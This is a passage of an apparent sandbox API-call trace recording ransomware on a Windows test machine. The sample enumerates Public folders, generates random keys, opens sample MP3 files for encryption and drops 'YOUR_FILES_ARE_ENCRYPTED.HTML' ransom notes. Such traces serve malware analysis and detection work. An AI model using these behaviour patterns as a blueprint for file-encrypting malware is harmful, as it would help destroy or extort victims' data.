nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.566] CloseHandle (hObject=0x5a0) returned 1 [0171.566] GetProcessHeap () returned 0x270000 [0171.566] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.566] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries") returned 29 [0171.567] GetProcessHeap () returned 0x270000 [0171.567] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.567] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Libraries" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries") returned="\\\\?\\C:\\Users\\Public\\Libraries" [0171.567] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Libraries", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned="\\\\?\\C:\\Users\\Public\\Libraries\\*" [0171.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b5ed1fc, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b5ed1fc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.568] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0171.568] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.568] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.568] lstrlenW (lpString=".ini") returned 4 
[0171.568] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.568] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 51 [0171.568] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.568] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0171.568] lstrlenW (lpString=".library-ms") returned 11 [0171.568] PathFindExtensionW (pszPath="RecordedTV.library-ms") returned=".library-ms" [0171.568] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.568] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 59 [0171.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\libraries\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.571] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.573] CloseHandle (hObject=0x5a0) returned 1 [0171.573] GetProcessHeap () returned 0x270000 [0171.574] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.574] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music") returned 25 [0171.574] GetProcessHeap () returned 0x270000 [0171.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.574] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Music" | out: 
lpString1="\\\\?\\C:\\Users\\Public\\Music") returned="\\\\?\\C:\\Users\\Public\\Music" [0171.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\*") returned="\\\\?\\C:\\Users\\Public\\Music\\*" [0171.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b3b1d58, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3b1d58, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.574] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0171.574] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.574] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.574] lstrlenW (lpString=".ini") returned 4 [0171.574] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.574] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned 38 [0171.574] GetProcessHeap () returned 0x270000 [0171.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.574] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music" [0171.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*") 
returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*" [0171.574] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.577] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0171.577] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.577] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.577] lstrlenW (lpString=".ini") returned 4 [0171.577] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.577] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0171.577] lstrcmpW (lpString1="Kalimba.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.577] PathFindExtensionW (pszPath="Kalimba.mp3") returned=".mp3" [0171.577] lstrlenW (lpString=".mp3") returned 4 [0171.577] PathFindExtensionW (pszPath="Kalimba.mp3") returned=".mp3" [0171.577] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.578] 
GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=8414449) returned 1 [0171.578] GetProcessHeap () returned 0x270000 [0171.578] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759008 [0171.581] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D5") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="ED") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="DD") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="41") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="70") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="18") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="85") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="59") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="24") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="ED") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1B") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="33") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="98") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="43") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="56") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="D9") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3C") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="82") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="95") returned 2 
[0171.582] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F6") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="25") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="96") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="E6") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="4F") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="8F") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="56") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="FF") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C3") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="53") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E9") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="9D") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="52") returned 2 [0171.583] lstrcpyW (in: lpString1=0x77690bc, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" [0171.583] CreateIoCompletionPort (FileHandle=0x600, ExistingCompletionPort=0x3a0, CompletionKey=0x7759008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.583] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759008, lpOverlapped=0x7759008) returned 1 [0171.583] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, 
ftLastAccessTime.dwLowDateTime=0xe1d2df02, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d54062, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0171.583] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0171.583] lstrcmpW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.583] PathFindExtensionW (pszPath="Maid with the Flaxen Hair.mp3") returned=".mp3" [0171.583] lstrlenW (lpString=".mp3") returned 4 [0171.583] PathFindExtensionW (pszPath="Maid with the Flaxen Hair.mp3") returned=".mp3" [0171.583] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0171.584] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=4113874) returned 1 [0171.584] GetProcessHeap () returned 0x270000 [0171.584] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0171.587] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D4") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3B") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="AE") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="33") returned 2 [0171.587] wsprintfW 
(in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5E") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D8") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="49") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6E") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3A") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B6") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="E5") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AF") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="2E") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="66") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="29") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="39") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="46") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BB") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="36") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C1") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BD") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="64") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="71") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="CD") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="83") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="8B") 
returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="59") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="29") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F7") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="55") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1B") returned 2 [0171.589] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" [0171.589] CreateIoCompletionPort (FileHandle=0x5fc, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.589] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0171.589] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d2df02, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0171.589] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0171.589] lstrcmpW (lpString1="Sleep Away.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 
-1 [0171.589] PathFindExtensionW (pszPath="Sleep Away.mp3") returned=".mp3" [0171.589] lstrlenW (lpString=".mp3") returned 4 [0171.589] PathFindExtensionW (pszPath="Sleep Away.mp3") returned=".mp3" [0171.589] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0171.590] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=4842585) returned 1 [0171.590] GetProcessHeap () returned 0x270000 [0171.590] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0171.593] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BB") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0A") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="01") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="8A") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="1F") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="6A") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4D") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C5") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="35") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6C") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="8A") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: 
param_1="1F") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="FC") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="CB") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="4D") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="3D") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="14") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BD") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="67") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F2") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="6E") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D4") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="69") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B9") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="15") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="4C") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="60") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="10") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="61") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="01") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0F") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="50") returned 2 [0171.595] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" | out: 
lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" [0171.595] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.595] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0171.595] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d2df02, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 0 [0171.595] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.595] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0171.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\music\\sample music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.595] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.598] CloseHandle (hObject=0x5f8) returned 1 [0171.598] GetProcessHeap () returned 0x270000 [0171.598] HeapFree (in: 
hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.598] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0171.599] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.599] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 55 [0171.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.599] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.601] CloseHandle (hObject=0x5a0) returned 1 [0171.601] GetProcessHeap () returned 0x270000 [0171.602] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.602] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, 
